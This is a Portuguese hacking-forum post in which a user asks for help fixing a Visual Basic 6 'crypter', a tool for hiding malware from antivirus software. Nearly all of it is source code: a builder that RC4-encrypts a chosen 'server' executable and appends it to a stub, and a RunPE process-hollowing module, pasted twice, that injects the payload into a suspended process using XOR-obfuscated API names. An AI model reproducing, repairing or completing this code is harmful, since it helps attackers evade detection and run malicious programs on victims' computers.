Tweet
Ajuda com Crypter (ESTUDO)
ae galerinha do mal 
Eu fiz um crypter mas esta com problema e eu nao sei onde eu errei.
Codigo Crypter
Runte
Stub
Ajuda ae
Eu fiz um crypter mas esta com problema e eu nao sei onde eu errei.
Codigo Crypter
Código:
Private Sub Command1_Click() With CD .DialogTitle = "Seleccione el archivo a encryptar" .Filter = "Aplicaciones EXE|*.exe" .ShowOpen End With If Not CD.FileName = vbNullString Then Text1.Text = CD.FileName MsgBox "Server Carregado", vbInformation, Me.Caption End If End Sub Private Sub Command2_Click() Dim Stub As String, Archivo As String If Text1.Text = vbNullString Then MsgBox "Primero debe cargar un archivo para encryptar", vbExclamation, Me.Caption Exit Sub Else Open App.Path & "\Stub.exe" For Binary As #1 Stub = Space(LOF(1)) Get #1, , Stub Close #1 Open Text1.Text For Binary As #1 Archivo = Space(LOF(1)) Get #1, , Archivo Close #1 With CD .DialogTitle = "Selecione la ruta donde desea guardar el archivo" .Filter = "Aplicaciones EXE|*.exe" .ShowSave End With If Not CD.FileName = vbNullString Then Archivo = RC4(Archivo, "DarkJairo60026112") Open CD.FileName For Binary As #1 Put #1, , Stub & "##$$##" & Archivo & "##$$##" Close #1 MsgBox "Seu Server Foi Encryptado Com Sucesso", vbInformation, Me.Caption End If End If End Sub Public Function RC4(ByVal G1B2H6TV As String, ByVal H1I8E5FU As String) As String On Error Resume Next Dim D5B2N7CK(0 To 255) As Integer, P1U0L1RO, X2I0X3SP As Long, T4T5I7IO() As Byte T4T5I7IO = StrConv(H1I8E5FU, vbFromUnicode) For P1U0L1RO = 0 To 255 X2I0X3SP = (X2I0X3SP + D5B2N7CK(P1U0L1RO) + T4T5I7IO(P1U0L1RO Mod Len(H1I8E5FU))) Mod 256 D5B2N7CK(P1U0L1RO) = P1U0L1RO Next P1U0L1RO T4T5I7IO() = StrConv(G1B2H6TV, vbFromUnicode) For P1U0L1RO = 0 To Len(G1B2H6TV) X2I0X3SP = (X2I0X3SP + D5B2N7CK(X2I0X3SP) + 1) Mod 256 T4T5I7IO(P1U0L1RO) = T4T5I7IO(P1U0L1RO) Xor D5B2N7CK(Temp + D5B2N7CK((X2I0X3SP + D5B2N7CK(X2I0X3SP)) Mod 254)) Next P1U0L1RO RC4 = StrConv(T4T5I7IO, vbUnicode) End Function
Runte
Código:
Option Explicit Private Const CONTEXT_FULL As Long = &H10007 Private Const MAX_PATH As Integer = 260 Private Const CREATE_SUSPENDED As Long = &H4 Private Const MEM_COMMIT As Long = &H1000 Private Const MEM_RESERVE As Long = &H2000 Private Const PAGE_EXECUTE_READWRITE As Long = &H40 Private Declare Function CreateProcessA Lib "kernel32" (ByVal lpAppName As String, ByVal lpCommandLine As String, ByVal lpProcessAttributes As Long, ByVal lpThreadAttributes As Long, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, ByVal lpEnvironment As Long, ByVal lpCurrentDirectory As Long, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, lpBaseAddress As Any, bvBuff As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long Private Declare Function OutputDebugString Lib "kernel32" Alias "OutputDebugStringA" (ByVal lpOutputString As String) As Long Public Declare Sub RtlMoveMemory Lib "kernel32" (Dest As Any, Src As Any, ByVal L As Long) Private Declare Function CallWindowProcA Lib "user32" (ByVal addr As Long, ByVal p1 As Long, ByVal p2 As Long, ByVal p3 As Long, ByVal p4 As Long) As Long Private Declare Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long Private Declare Function LoadLibraryA Lib "kernel32" (ByVal lpLibFileName As String) As Long Private Type SECURITY_ATTRIBUTES nLength As Long lpSecurityDescriptor As Long bInheritHandle As Long End Type Private Type STARTUPINFO cb As Long lpReserved As Long lpDesktop As Long lpTitle As Long dwX As Long dwY As Long dwXSize As Long dwYSize As Long dwXCountChars As Long dwYCountChars As Long dwFillAttribute As Long dwFlags As Long wShowWindow As Integer cbReserved2 As Integer lpReserved2 As Long hStdInput As Long hStdOutput As Long hStdError As Long End Type Private Type PROCESS_INFORMATION hProcess As Long hThread As Long dwProcessId As Long dwThreadID As Long End Type Private Type FLOATING_SAVE_AREA ControlWord As Long StatusWord As Long TagWord As Long ErrorOffset As Long ErrorSelector As Long DataOffset As Long DataSelector As Long RegisterArea(1 To 80) As Byte Cr0NpxState As Long End Type Private Type CONTEXT ContextFlags As Long Dr0 As Long Dr1 As Long Dr2 As Long Dr3 As Long Dr6 As Long Dr7 As Long FloatSave As FLOATING_SAVE_AREA SegGs As Long SegFs As Long SegEs As Long SegDs As Long Edi As Long Esi As Long Ebx As Long Edx As Long Ecx As Long Eax As Long Ebp As Long Eip As Long SegCs As Long EFlags As Long Esp As Long SegSs As Long End Type Private Type IMAGE_DOS_HEADER e_magic As Integer e_cblp As Integer e_cp As Integer e_crlc As Integer e_cparhdr As Integer e_minalloc As Integer e_maxalloc As Integer e_ss As Integer e_sp As Integer e_csum As Integer e_ip As Integer e_cs As Integer e_lfarlc As Integer e_ovno As Integer e_res(0 To 3) As Integer e_oemid As Integer e_oeminfo As Integer e_res2(0 To 9) As Integer e_lfanew As Long End Type Private Type IMAGE_FILE_HEADER Machine As Integer NumberOfSections As Integer TimeDateStamp As Long PointerToSymbolTable As Long NumberOfSymbols As Long SizeOfOptionalHeader As Integer characteristics As Integer End Type Private Type IMAGE_DATA_DIRECTORY VirtualAddress As Long Size As Long End Type Private Type IMAGE_OPTIONAL_HEADER Magic As Integer MajorLinkerVersion As Byte MinorLinkerVersion As Byte SizeOfCode As Long SizeOfInitializedData As Long SizeOfUnitializedData As Long AddressOfEntryPoint As Long BaseOfCode As Long BaseOfData As Long ImageBase As Long SectionAlignment As Long FileAlignment As Long MajorOperatingSystemVersion As Integer MinorOperatingSystemVersion As Integer MajorImageVersion As Integer MinorImageVersion As Integer MajorSubsystemVersion As Integer MinorSubsystemVersion As Integer W32VersionValue As Long SizeOfImage As Long SizeOfHeaders As Long CheckSum As Long SubSystem As Integer DllCharacteristics As Integer SizeOfStackReserve As Long SizeOfStackCommit As Long SizeOfHeapReserve As Long SizeOfHeapCommit As Long LoaderFlags As Long NumberOfRvaAndSizes As Long DataDirectory(0 To 15) As IMAGE_DATA_DIRECTORY End Type Private Type IMAGE_NT_HEADERS Signature As Long FileHeader As IMAGE_FILE_HEADER OptionalHeader As IMAGE_OPTIONAL_HEADER End Type Private Type IMAGE_SECTION_HEADER SecName As String * 8 VirtualSize As Long VirtualAddress As Long SizeOfRawData As Long PointerToRawData As Long PointerToRelocations As Long PointerToLinenumbers As Long NumberOfRelocations As Integer NumberOfLinenumbers As Integer characteristics As Long End Type Public Function SYOSXQL(ByVal TUBB As String, ByVal NICOE As String, ParamArray ODTNTUX()) As Long Dim LURIE As Long, JTVV(&HEC00& - 1) As Byte, XIJ As Long, WTBXUMY As Long WTBXUMY = GetProcAddress(LoadLibraryA(TUBB), NICOE) If WTBXUMY = 0 Then Exit Function LURIE = VarPtr(JTVV(0)) RtlMoveMemory ByVal LURIE, &H59595958, &H4: LURIE = LURIE + 4 RtlMoveMemory ByVal LURIE, &H5059, &H2: LURIE = LURIE + 2 For XIJ = UBound(ODTNTUX) To 0 Step -1 RtlMoveMemory ByVal LURIE, &H68, &H1: LURIE = LURIE + 1 RtlMoveMemory ByVal LURIE, CLng(ODTNTUX(XIJ)), &H4: LURIE = LURIE + 4 Next RtlMoveMemory ByVal LURIE, &HE8, &H1: LURIE = LURIE + 1 RtlMoveMemory ByVal LURIE, WTBXUMY - LURIE - 4, &H4: LURIE = LURIE + 4 RtlMoveMemory ByVal LURIE, &HC3, &H1: LURIE = LURIE + 1 SYOSXQL = CallWindowProcA(VarPtr(JTVV(0)), 0, 0, 0, 0) End Function Public Function NIFHB(ByVal SRHGCP As String, ByVal ZKDMJ As String) As String Dim OQF As Long For OQF = 1 To Len(SRHGCP) NIFHB = NIFHB & Chr(Asc(Mid(ZKDMJ, IIf(OQF Mod Len(ZKDMJ) <> 0, OQF Mod Len(ZKDMJ), Len(ZKDMJ)), 1)) Xor Asc(Mid(SRHGCP, OQF, 1))) Next OQF End Function Public Sub WNUSFLM(ByVal PHIWM As String, ByRef ZWYS() As Byte, RJYXT As String) Dim ZVB As Long, LNNO As IMAGE_DOS_HEADER, LTWSE As IMAGE_NT_HEADERS, QXPNMQ As IMAGE_SECTION_HEADER Dim EPAIKQG As STARTUPINFO, KPIDLM As PROCESS_INFORMATION, SYLBTN As CONTEXT EPAIKQG.cb = Len(EPAIKQG) RtlMoveMemory LNNO, ZWYS(0), 64 RtlMoveMemory LTWSE, ZWYS(LNNO.e_lfanew), 248 CreateProcessA PHIWM, " " & RJYXT, 0, 0, False, CREATE_SUSPENDED, 0, 0, EPAIKQG, KPIDLM SYOSXQL NIFHB(Chr(45) & Chr(56) & Chr(47) & Chr(54) & Chr(32), "CLKZLJCEMGSSFBUHWHVMZMHJBJXGAXYTLEZYUILW"), NIFHB(Chr(13) & Chr(56) & Chr(30) & Chr(52) & Chr(33) & Chr(43) & Chr(51) & Chr(19) & Chr(36) & Chr(34) & Chr(36) & Chr(28) & Chr(32) & Chr(17) & Chr(48) & Chr(43) & Chr(35) & Chr(33) & Chr(57) & Chr(35), "CLKZLJCEMGSSFBUHWHVMZMHJBJXGAXYTLEZYUILW"), KPIDLM.hProcess, LTWSE.OptionalHeader.ImageBase SYOSXQL NIFHB(Chr(40) & Chr(41) & Chr(57) & Chr(52) & Chr(41) & Chr(38) & Chr(112) & Chr(119), "CLKZLJCEMGSSFBUHWHVMZMHJBJXGAXYTLEZYUILW"), NIFHB(Chr(21) & Chr(37) & Chr(57) & Chr(46) & Chr(57) & Chr(43) & Chr(47) & Chr(4) & Chr(33) & Chr(43) & Chr(60) & Chr(48) & Chr(3) & Chr(58), "CLKZLJCEMGSSFBUHWHVMZMHJBJXGAXYTLEZYUILW"), KPIDLM.hProcess, LTWSE.OptionalHeader.ImageBase, LTWSE.OptionalHeader.SizeOfImage, MEM_COMMIT Or MEM_RESERVE, PAGE_EXECUTE_READWRITE WriteProcessMemory KPIDLM.hProcess, ByVal LTWSE.OptionalHeader.ImageBase, ZWYS(0), LTWSE.OptionalHeader.SizeOfHeaders, 0 For ZVB = 0 To LTWSE.FileHeader.NumberOfSections - 1 RtlMoveMemory QXPNMQ, ZWYS(LNNO.e_lfanew + 248 + 40 * ZVB), Len(QXPNMQ) WriteProcessMemory KPIDLM.hProcess, ByVal LTWSE.OptionalHeader.ImageBase + QXPNMQ.VirtualAddress, ZWYS(QXPNMQ.PointerToRawData), QXPNMQ.SizeOfRawData, 0 Next ZVB SYLBTN.ContextFlags = CONTEXT_FULL SYOSXQL NIFHB(Chr(40) & Chr(41) & Chr(57) & Chr(52) & Chr(41) & Chr(38) & Chr(112) & Chr(119), "CLKZLJCEMGSSFBUHWHVMZMHJBJXGAXYTLEZYUILW"), NIFHB(Chr(4) & Chr(41) & Chr(63) & Chr(14) & Chr(36) & Chr(56) & Chr(38) & Chr(36) & Chr(41) & Chr(4) & Chr(60) & Chr(61) & Chr(50) & Chr(39) & Chr(45) & Chr(60), "CLKZLJCEMGSSFBUHWHVMZMHJBJXGAXYTLEZYUILW"), KPIDLM.hThread, VarPtr(SYLBTN) WriteProcessMemory KPIDLM.hProcess, ByVal SYLBTN.Ebx + 8, LTWSE.OptionalHeader.ImageBase, 4, 0 SYLBTN.Eax = LTWSE.OptionalHeader.ImageBase + LTWSE.OptionalHeader.AddressOfEntryPoint SYOSXQL NIFHB(Chr(40) & Chr(41) & Chr(57) & Chr(52) & Chr(41) & Chr(38) & Chr(112) & Chr(119), "CLKZLJCEMGSSFBUHWHVMZMHJBJXGAXYTLEZYUILW"), NIFHB(Chr(16) & Chr(41) & Chr(63) & Chr(14) & Chr(36) & Chr(56) & Chr(38) & Chr(36) & Chr(41) & Chr(4) & Chr(60) & Chr(61) & Chr(50) & Chr(39) & Chr(45) & Chr(60), "CLKZLJCEMGSSFBUHWHVMZMHJBJXGAXYTLEZYUILW"), KPIDLM.hThread, VarPtr(SYLBTN) SYOSXQL NIFHB(Chr(40) & Chr(41) & Chr(57) & Chr(52) & Chr(41) & Chr(38) & Chr(112) & Chr(119), "CLKZLJCEMGSSFBUHWHVMZMHJBJXGAXYTLEZYUILW"), NIFHB(Chr(17) & Chr(41) & Chr(56) & Chr(47) & Chr(33) & Chr(47) & Chr(23) & Chr(45) & Chr(63) & Chr(34) & Chr(50) & Chr(55), "CLKZLJCEMGSSFBUHWHVMZMHJBJXGAXYTLEZYUILW"), KPIDLM.hThread End Sub
Código:
Option Explicit Private Const CONTEXT_FULL As Long = &H10007 Private Const MAX_PATH As Integer = 260 Private Const CREATE_SUSPENDED As Long = &H4 Private Const MEM_COMMIT As Long = &H1000 Private Const MEM_RESERVE As Long = &H2000 Private Const PAGE_EXECUTE_READWRITE As Long = &H40 Private Declare Function CreateProcessA Lib "kernel32" (ByVal lpAppName As String, ByVal lpCommandLine As String, ByVal lpProcessAttributes As Long, ByVal lpThreadAttributes As Long, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, ByVal lpEnvironment As Long, ByVal lpCurrentDirectory As Long, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, lpBaseAddress As Any, bvBuff As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long Private Declare Function OutputDebugString Lib "kernel32" Alias "OutputDebugStringA" (ByVal lpOutputString As String) As Long Public Declare Sub RtlMoveMemory Lib "kernel32" (Dest As Any, Src As Any, ByVal L As Long) Private Declare Function CallWindowProcA Lib "user32" (ByVal addr As Long, ByVal p1 As Long, ByVal p2 As Long, ByVal p3 As Long, ByVal p4 As Long) As Long Private Declare Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long Private Declare Function LoadLibraryA Lib "kernel32" (ByVal lpLibFileName As String) As Long Private Type SECURITY_ATTRIBUTES nLength As Long lpSecurityDescriptor As Long bInheritHandle As Long End Type Private Type STARTUPINFO cb As Long lpReserved As Long lpDesktop As Long lpTitle As Long dwX As Long dwY As Long dwXSize As Long dwYSize As Long dwXCountChars As Long dwYCountChars As Long dwFillAttribute As Long dwFlags As Long wShowWindow As Integer cbReserved2 As Integer lpReserved2 As Long hStdInput As Long hStdOutput As Long hStdError As Long End Type Private Type PROCESS_INFORMATION hProcess As Long hThread As Long dwProcessId As Long dwThreadID As Long End Type Private Type FLOATING_SAVE_AREA ControlWord As Long StatusWord As Long TagWord As Long ErrorOffset As Long ErrorSelector As Long DataOffset As Long DataSelector As Long RegisterArea(1 To 80) As Byte Cr0NpxState As Long End Type Private Type CONTEXT ContextFlags As Long Dr0 As Long Dr1 As Long Dr2 As Long Dr3 As Long Dr6 As Long Dr7 As Long FloatSave As FLOATING_SAVE_AREA SegGs As Long SegFs As Long SegEs As Long SegDs As Long Edi As Long Esi As Long Ebx As Long Edx As Long Ecx As Long Eax As Long Ebp As Long Eip As Long SegCs As Long EFlags As Long Esp As Long SegSs As Long End Type Private Type IMAGE_DOS_HEADER e_magic As Integer e_cblp As Integer e_cp As Integer e_crlc As Integer e_cparhdr As Integer e_minalloc As Integer e_maxalloc As Integer e_ss As Integer e_sp As Integer e_csum As Integer e_ip As Integer e_cs As Integer e_lfarlc As Integer e_ovno As Integer e_res(0 To 3) As Integer e_oemid As Integer e_oeminfo As Integer e_res2(0 To 9) As Integer e_lfanew As Long End Type Private Type IMAGE_FILE_HEADER Machine As Integer NumberOfSections As Integer TimeDateStamp As Long PointerToSymbolTable As Long NumberOfSymbols As Long SizeOfOptionalHeader As Integer characteristics As Integer End Type Private Type IMAGE_DATA_DIRECTORY VirtualAddress As Long Size As Long End Type Private Type IMAGE_OPTIONAL_HEADER Magic As Integer MajorLinkerVersion As Byte MinorLinkerVersion As Byte SizeOfCode As Long SizeOfInitializedData As Long SizeOfUnitializedData As Long AddressOfEntryPoint As Long BaseOfCode As Long BaseOfData As Long ImageBase As Long SectionAlignment As Long FileAlignment As Long MajorOperatingSystemVersion As Integer MinorOperatingSystemVersion As Integer MajorImageVersion As Integer MinorImageVersion As Integer MajorSubsystemVersion As Integer MinorSubsystemVersion As Integer W32VersionValue As Long SizeOfImage As Long SizeOfHeaders As Long CheckSum As Long SubSystem As Integer DllCharacteristics As Integer SizeOfStackReserve As Long SizeOfStackCommit As Long SizeOfHeapReserve As Long SizeOfHeapCommit As Long LoaderFlags As Long NumberOfRvaAndSizes As Long DataDirectory(0 To 15) As IMAGE_DATA_DIRECTORY End Type Private Type IMAGE_NT_HEADERS Signature As Long FileHeader As IMAGE_FILE_HEADER OptionalHeader As IMAGE_OPTIONAL_HEADER End Type Private Type IMAGE_SECTION_HEADER SecName As String * 8 VirtualSize As Long VirtualAddress As Long SizeOfRawData As Long PointerToRawData As Long PointerToRelocations As Long PointerToLinenumbers As Long NumberOfRelocations As Integer NumberOfLinenumbers As Integer characteristics As Long End Type Public Function SYOSXQL(ByVal TUBB As String, ByVal NICOE As String, ParamArray ODTNTUX()) As Long Dim LURIE As Long, JTVV(&HEC00& - 1) As Byte, XIJ As Long, WTBXUMY As Long WTBXUMY = GetProcAddress(LoadLibraryA(TUBB), NICOE) If WTBXUMY = 0 Then Exit Function LURIE = VarPtr(JTVV(0)) RtlMoveMemory ByVal LURIE, &H59595958, &H4: LURIE = LURIE + 4 RtlMoveMemory ByVal LURIE, &H5059, &H2: LURIE = LURIE + 2 For XIJ = UBound(ODTNTUX) To 0 Step -1 RtlMoveMemory ByVal LURIE, &H68, &H1: LURIE = LURIE + 1 RtlMoveMemory ByVal LURIE, CLng(ODTNTUX(XIJ)), &H4: LURIE = LURIE + 4 Next RtlMoveMemory ByVal LURIE, &HE8, &H1: LURIE = LURIE + 1 RtlMoveMemory ByVal LURIE, WTBXUMY - LURIE - 4, &H4: LURIE = LURIE + 4 RtlMoveMemory ByVal LURIE, &HC3, &H1: LURIE = LURIE + 1 SYOSXQL = CallWindowProcA(VarPtr(JTVV(0)), 0, 0, 0, 0) End Function Public Function NIFHB(ByVal SRHGCP As String, ByVal ZKDMJ As String) As String Dim OQF As Long For OQF = 1 To Len(SRHGCP) NIFHB = NIFHB & Chr(Asc(Mid(ZKDMJ, IIf(OQF Mod Len(ZKDMJ) <> 0, OQF Mod Len(ZKDMJ), Len(ZKDMJ)), 1)) Xor Asc(Mid(SRHGCP, OQF, 1))) Next OQF End Function Public Sub WNUSFLM(ByVal PHIWM As String, ByRef ZWYS() As Byte, RJYXT As String) Dim ZVB As Long, LNNO As IMAGE_DOS_HEADER, LTWSE As IMAGE_NT_HEADERS, QXPNMQ As IMAGE_SECTION_HEADER Dim EPAIKQG As STARTUPINFO, KPIDLM As PROCESS_INFORMATION, SYLBTN As CONTEXT EPAIKQG.cb = Len(EPAIKQG) RtlMoveMemory LNNO, ZWYS(0), 64 RtlMoveMemory LTWSE, ZWYS(LNNO.e_lfanew), 248 CreateProcessA PHIWM, " " & RJYXT, 0, 0, False, CREATE_SUSPENDED, 0, 0, EPAIKQG, KPIDLM SYOSXQL NIFHB(Chr(45) & Chr(56) & Chr(47) & Chr(54) & Chr(32), "CLKZLJCEMGSSFBUHWHVMZMHJBJXGAXYTLEZYUILW"), NIFHB(Chr(13) & Chr(56) & Chr(30) & Chr(52) & Chr(33) & Chr(43) & Chr(51) & Chr(19) & Chr(36) & Chr(34) & Chr(36) & Chr(28) & Chr(32) & Chr(17) & Chr(48) & Chr(43) & Chr(35) & Chr(33) & Chr(57) & Chr(35), "CLKZLJCEMGSSFBUHWHVMZMHJBJXGAXYTLEZYUILW"), KPIDLM.hProcess, LTWSE.OptionalHeader.ImageBase SYOSXQL NIFHB(Chr(40) & Chr(41) & Chr(57) & Chr(52) & Chr(41) & Chr(38) & Chr(112) & Chr(119), "CLKZLJCEMGSSFBUHWHVMZMHJBJXGAXYTLEZYUILW"), NIFHB(Chr(21) & Chr(37) & Chr(57) & Chr(46) & Chr(57) & Chr(43) & Chr(47) & Chr(4) & Chr(33) & Chr(43) & Chr(60) & Chr(48) & Chr(3) & Chr(58), "CLKZLJCEMGSSFBUHWHVMZMHJBJXGAXYTLEZYUILW"), KPIDLM.hProcess, LTWSE.OptionalHeader.ImageBase, LTWSE.OptionalHeader.SizeOfImage, MEM_COMMIT Or MEM_RESERVE, PAGE_EXECUTE_READWRITE WriteProcessMemory KPIDLM.hProcess, ByVal LTWSE.OptionalHeader.ImageBase, ZWYS(0), LTWSE.OptionalHeader.SizeOfHeaders, 0 For ZVB = 0 To LTWSE.FileHeader.NumberOfSections - 1 RtlMoveMemory QXPNMQ, ZWYS(LNNO.e_lfanew + 248 + 40 * ZVB), Len(QXPNMQ) WriteProcessMemory KPIDLM.hProcess, ByVal LTWSE.OptionalHeader.ImageBase + QXPNMQ.VirtualAddress, ZWYS(QXPNMQ.PointerToRawData), QXPNMQ.SizeOfRawData, 0 Next ZVB SYLBTN.ContextFlags = CONTEXT_FULL SYOSXQL NIFHB(Chr(40) & Chr(41) & Chr(57) & Chr(52) & Chr(41) & Chr(38) & Chr(112) & Chr(119), "CLKZLJCEMGSSFBUHWHVMZMHJBJXGAXYTLEZYUILW"), NIFHB(Chr(4) & Chr(41) & Chr(63) & Chr(14) & Chr(36) & Chr(56) & Chr(38) & Chr(36) & Chr(41) & Chr(4) & Chr(60) & Chr(61) & Chr(50) & Chr(39) & Chr(45) & Chr(60), "CLKZLJCEMGSSFBUHWHVMZMHJBJXGAXYTLEZYUILW"), KPIDLM.hThread, VarPtr(SYLBTN) WriteProcessMemory KPIDLM.hProcess, ByVal SYLBTN.Ebx + 8, LTWSE.OptionalHeader.ImageBase, 4, 0 SYLBTN.Eax = LTWSE.OptionalHeader.ImageBase + LTWSE.OptionalHeader.AddressOfEntryPoint SYOSXQL NIFHB(Chr(40) & Chr(41) & Chr(57) & Chr(52) & Chr(41) & Chr(38) & Chr(112) & Chr(119), "CLKZLJCEMGSSFBUHWHVMZMHJBJXGAXYTLEZYUILW"), NIFHB(Chr(16) & Chr(41) & Chr(63) & Chr(14) & Chr(36) & Chr(56) & Chr(38) & Chr(36) & Chr(41) & Chr(4) & Chr(60) & Chr(61) & Chr(50) & Chr(39) & Chr(45) & Chr(60), "CLKZLJCEMGSSFBUHWHVMZMHJBJXGAXYTLEZYUILW"), KPIDLM.hThread, VarPtr(SYLBTN) SYOSXQL NIFHB(Chr(40) & Chr(41) & Chr(57) & Chr(52) & Chr(41) & Chr(38) & Chr(112) & Chr(119), "CLKZLJCEMGSSFBUHWHVMZMHJBJXGAXYTLEZYUILW"), NIFHB(Chr(17) & Chr(41) & Chr(56) & Chr(47) & Chr(33) & Chr(47) & Chr(23) & Chr(45) & Chr(63) & Chr(34) & Chr(50) & Chr(55), "CLKZLJCEMGSSFBUHWHVMZMHJBJXGAXYTLEZYUILW"), KPIDLM.hThread End Sub